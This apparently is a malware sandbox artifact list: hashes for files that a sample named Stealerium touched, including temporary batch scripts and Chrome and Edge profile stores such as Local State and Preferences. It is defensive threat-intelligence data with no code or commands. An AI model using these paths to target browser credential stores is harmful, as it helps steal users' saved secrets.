| MD5 | 0b18edb35ce93b30df0b39afffc9186e |
| SHA1 | fb3acd9abef08bdd30e309c921a47a9b84448b21 |
| SHA256 | c583198209f64b940e093a28bab17b9f3f09fb6d6d66f2a4df387aec56e8541e |
| SHA512 | d7653eda85a2123232611af3039694805095c7c2d1173d34a3e672d1748fac351c6037d997758b00b693f07f35ea0ca3237baa73b3733571cf47d03f66b1e43f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 930f830f8bb33c3450c92afd1ee648fb |
| SHA1 | 5cd76d74b5a39f01ed4475e8df7c66ad73f671c2 |
| SHA256 | d1ea91744b48a92ea047c2baac7256bbe9b93a68a1285490dcbb95caade8ebff |
| SHA512 | eabf302e7f8e2ab655a86163392b37bb8d044848a878a1b629d4df999238bcd5250d07b4698072e2b265079eb40cc8d20ed2b7981c29965b53ad3c6a083b5698 |
C:\Users\Admin\AppData\Local\Temp\Stealerium-Latest.log
| MD5 | e4e3024c9972f25688493f9fa7d9743a |
| SHA1 | 6502644386a4fc2ad36e05d1909f2c92249be0a9 |
| SHA256 | 944ebf6a5acbe916fa4d8cda5e899dd1597e5c1a01d7c2d100e118e5152180f1 |
| SHA512 | 2a0d9d0b8362aba3e9200e3e44e095de8d4e96b2837c64063a3873953befa811c65b05c5e328fb95ccdb94866eb55183368a8ee0da08eaeec5dbeef0d9eb5a72 |
C:\Users\Admin\AppData\Local\Temp\tmpC8AE.tmp.bat
| MD5 | 734ef55c54eebef227eeb371e5c9f3f6 |
| SHA1 | 785e5f728dbca0083f4064b621d8b268f16535eb |
| SHA256 | 7563a912e6e353e288fe84e9741c247abdfc151ab0367baa51b8df982e04b1ad |
| SHA512 | e8e3db9bb5af23cef6b4274873810718c60b07b184858ae847f8b857b837a34af0e82ea74603a2544bbbcdedd4280af5db22b4a4e1dbf2785da301ca0e6252ef |
C:\Users\Admin\Desktop\sorka.bat
| MD5 | b960acfdeee6783601b185ff5d2b560e |
| SHA1 | 0992387cb4aa6a0e378332089932e90ba86f10aa |
| SHA256 | 025c2b79ae5e818e3416ba96cae647c3129dda08beed67611803bd4cbefb9c4d |
| SHA512 | b242d2f042693827257babf74656d24f2919285cfe342988b30534e2ed6604c2544a83d5c338f840dc0e469dba6c98df5c5e4a4968844ac5d4247451f4c1aa75 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | cd0a47a0e25cb8ad556c063328636f95 |
| SHA1 | 131960de0e61d81a77b3fafa92ab977de462dcb7 |
| SHA256 | ce8159ae55654f022b2f592ac8b57c9262744df9732dfa96e0c17604521767cd |
| SHA512 | e47a3e374561e66e4d0a0a2610e8d05b4a1987fab5cc3a485fc70e4e46481ea0d61b248238012e933eb50d61155cbd535978edc7ce679d7348b96295c6f0bc9f |
C:\Users\Admin\AppData\Local\Temp\Stealerium-Latest.log
| MD5 | 4f6a71210945a9a83c5931f00fdb6dd4 |
| SHA1 | c311bf67f0dc0cc6785d4aa1665e5dff0a163187 |
| SHA256 | 9ca97c4a42dc9cc138b197dc26a38d8a367323840628cfc9589dd179d9ec9dba |
| SHA512 | 72182129cdefc16538cc1aa74f06a417235b655ce274862ccdce148ed1dd0c7ad018a6f5885ef1d85569c4013b121489aae4732d4ebfdeebcfbe1343d79d7336 |
C:\Users\Admin\AppData\Local\Temp\tmp9499.tmp.bat
| MD5 | 54498b2cbdb920491098040939097c56 |
| SHA1 | 51a52cb5f2b656f976b37dd8f378a7e78cb26fc1 |
| SHA256 | dd17ac136f50a54ee903a27bd400000bb61ca71f10551e2a5e24a94bb3c78de7 |
| SHA512 | cf33306057553765ea864ec2f91109c35b569022db46d842e3c4455741f5440a265224aa77d9c9f883efdbcf1c9b3addd2e4af563eb4ed5ce77b8c0750f623df |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 09fcbabdcb8114f4e8ce74120e7e32a1 |
| SHA1 | f223e92413cd1b73037318bf9cf1a438c68eb0b1 |
| SHA256 | 1991844979733d1ae2f01293a223d7e941b8e7d099bb99c1aa7026d88b742b45 |
| SHA512 | 5cbda573fecd9aafa5be86f64c35cec0a5fcd41efcb9424335ea51bdad1dbccd7457f613696e6d9a2ec07492e17e90621dd7b2202ba38ac34e627b2d148baea3 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 53e06a16ce467c4ad2df69fd97689200 |
| SHA1 | a180e3aced2dfa369efc571f9d34ed8d38002743 |
| SHA256 | a6608431d07bbbe60684c099dbd4c264fb928041580c2d49307d5ace8309de36 |
| SHA512 | 5c58d149e3b9dc5c1f50c0b4e7e9e0d76cdb70e2b410c77a76afba5304287f3c6ae16aae488eca6dd774de8517a6465d5c3ff2b0e4c0356a578a2579002a6272 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | fb45600bedbc78f1cd6d2ab9005ee87b |
| SHA1 | 6bdc163572f0d5ce83b303fba90769452967fcb3 |
| SHA256 | 9cb0b8291957a0d9f9d1e708ccf3ba21c38eb7de9a9c181b175f1d1fbad29eca |
| SHA512 | 792f633e8306cc7ec7b26af506cb3874e16d2ec328b295a7119dad1eac3ffbf7245b5ff7a09dd3db9c8b51c53040faf6a6da37235b377fffb7c3d69ddcebd293 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | aad13b29fac8108de06dad0cbbbcefcd |
| SHA1 | aeb7b4bdb77e9d742579dc82db296db06341ed7c |
| SHA256 | 5a641a3c547e440e91bbac0c58a40bb2e4b82947a3c47ccbada0808a2e2401fe |
| SHA512 | 8d161a6e4af0b3d8abfcb16bddca9979f0c5a40db72cf348bb0ccc4e389c1ad4b9a0f4a1458e9f450d772429dbca29e0f7550538877240cfb231877014b245c9 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | a668c3b0730a1c3cffad0eda995df67e |
| SHA1 | a72ad78114c6b6447f1781233ac025a87ac371e6 |
| SHA256 | 9e3a32f8f193ecf789ed397c9e49a829bb6ea2dc2b23cde952063b5a2f711917 |
| SHA512 | 9a2dda8a921a1d11905e879ff729b275ff4ac21b33e83178c36004433c85968069e734f7c48bbb9f38c22779c3605bfa58548afcc1db4e8ac13318e6805a1b95 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | b50cd372e9054cdbac0b9ad34c5853fb |
| SHA1 | ee59a8a4584edc4ef242b1e48774519032a5bde2 |
| SHA256 | b78ec1996c4b6c9d9ed4ff54366404a94005212a8ff641ed9d630a3bf06f1cd3 |
| SHA512 | 98f4fa7e5863fe9a06d2e4aa15fcd9bfc74a3621af57e431bfe834ab478d01fa84101ab87cd76f9a82eb26c6bff05f8dd2e22c3e0c78449a92cc941c7ee57ab4 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 7b881fc55e71989f9bdd4adb5624dcec |
| SHA1 | 445a604ce9e446fa172e8039478010741c53bf40 |
| SHA256 | f2c417de4aebcb9dd2f807dfdcb12c3723e6751edc4741761eb02514069b382e |
| SHA512 | 9dd64eb87857718898717c860f094ccff12ef4eecae7c682f0731143e2e2239f962f53fcc46287d8d02573ff963139fa1921e4be721e10b8fdef6b83320f27cc |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | ced81ca8cbbc3cf417084aa57a58f06b |
| SHA1 | 4b15f9faae9a93d4ea100d64a7805629948d0f5a |
| SHA256 | fa20dbf0921434c76f131873cf859fd63574707bdebc17bc4b9afd04b1705062 |
| SHA512 | 19ff0ad4252e76fe8caf2f603836536c67da622ef8b47908d2a716602cf203cbc9ea680796b87ef5ba8754f8c39eb24d07058f92270740a5483560348a416acf |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
| MD5 | 12b83e989851738f4289adcc37d5023b |
| SHA1 | dae4ffd3ea26a44812a491b93fa1cc360c63ff12 |
| SHA256 | 0671e614cf8e13a6f5c0785637d353773dbbf4c3e127fb463ce099c79c8f5950 |
| SHA512 | c4f3930765c45d90abc5c2a5f5be42e6d4cb98f533a8c72f8fd9c4ce73156850f1482f103584dbda8aa911568dcac35f8322cd27083ac3ad78132e6af8857f46 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\2d75ce98-856d-4f1e-a07e-fc878ab385de.tmp
| MD5 | 5058f1af8388633f609cadb75a75dc9d |
| SHA1 | 3a52ce780950d4d969792a2559cd519d7ee8c727 |
| SHA256 | cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8 |
| SHA512 | 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 8992681ea7d80670264a1a81d3fb0b09 |
| SHA1 | 507691c890726168edde4f2fd4aee78e8095fd3f |
| SHA256 | 9350e67c75bd6260adfea42f7be899c252ed40e194842a29c08375edbab95efe |
| SHA512 | 784d08f925dc20943c6175518fa6027b07b24fe17d03bac69bfd32bf96f0f0f6c6df2b39c4b02ca36d64ac2bda2be29e486b8c75c8ce10a37b091e832171007d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 51b966f65a4773524127d53293ed6861 |
| SHA1 | 95b9f6a11e8deec32e2af6681f1905ac579ebd6e |
| SHA256 | 4d39d633be7c7a730507ff49bf17e023b1b3322ae830b6135ac9c51b069d3a64 |
| SHA512 | f4a6be63e664440387bbbcc809e3bd16b7e440331351c6de86bc6bf6d5b55ad6879cfe032f0d9245c844fc89dc452cec8f8c0abdf910cfb876a5cb7fa26e7b0b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | ab5fa5314ac3a695fc8ede126a45e914 |
| SHA1 | 607ead480a97b1dc95747872f042a76d42b9aa5a |
| SHA256 | 5bc482f0b39b40851dc365e9e7f3527544a3fbfe3e47d6588459cb0303461be0 |
| SHA512 | 26e59f3514c39b4740d091baf25ed07fcd939c78719728af06b283ca4b5d7a74db34c8da0f5e5e68790ac71e7fddd02fbdfc035bb0feea910eae4a1491d048ec |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | c0dcc47ca80a1719f18d156201bf5816 |
| SHA1 | 6ebd62a7496885f9403c6c01f2e9b3fc4bb7696e |
| SHA256 | 291872f65a8cc9818e65579c5e90297d97e528996c23a875da0a1675762bf16c |
| SHA512 | 5e0f0795e617df1d24ae285af0ee6ad89030220dee30978ce42aec739c51976ae92b7cb8101ca4ddf6f5ef53b65c746afc779f72d0edb88a8c1b293316199cb8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 73035a10f9e4802d00f6907f0b8388bc |
| SHA1 | 5809b8afc50080d4014463b5e4b161e4d5dc0b1b |
| SHA256 | 89ae5ac0826766fb720fb8cdb8a15e6f61addf3bbc00e7b29a4d13cf00cf71fb |
| SHA512 | 9aa78861bfe53fb41529957b96f1a4bc923d5dde9ef2422b2aad2ac5a161ec719ed41d3e0b348d5d6593d6033e73cea5cb485c3442cea7bbb0071b361caa6d27 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 7b6d8f3e1afea096a7e55145213a8a8b |
| SHA1 | 719b8c31114dea05c9aefa6bf88c88547df03bc1 |
| SHA256 | 94b53f1543738af2ea86cc944637a92a3ee77d129d5ef21b2981732fdadd7973 |
| SHA512 | dae2527d097090737969d27ad1bd18a415a144d8f8eea856ff4cee4de096cc693132c38d7eae6b295d5324bbdde68006ad85ae30dfc8d491f8089f1abc0c4558 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 36221e7f9284fe3c85db7ca14e619458 |
| SHA1 | fe0a911c03d853809df0b80c8c12c1d9f57b0198 |
| SHA256 | 0e3026593139ab3033ec75dae9add4b0574beecab255bdb0864cb65984e91c90 |
| SHA512 | fa37076a0263a900277438519ad3528c6ab0f040051247622e9ce2dd02ecbb19e19b9f1e1b881464078164c9efb9fbcffb6c7fbb46fea7ca2fae0ea7fadf7ef3 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 35e1223c569e324f5d75e31b6678a9c5 |
| SHA1 | 3244ee0ce947be08eddd3615546bb929aef44245 |
| SHA256 | deba4c3dc8a5d0832bf0072e6a8bc887bf01560391eb2e5d413f3c1aa1c29c12 |
| SHA512 | 60d6265f6c4cedbf847f9756f96252ee5dab7127e5c5fbc25e8912cc0f255d3bf5923874c1c7abbb07883ba63c34aea1848b412f0c7e1415056b2ae9e245f484 |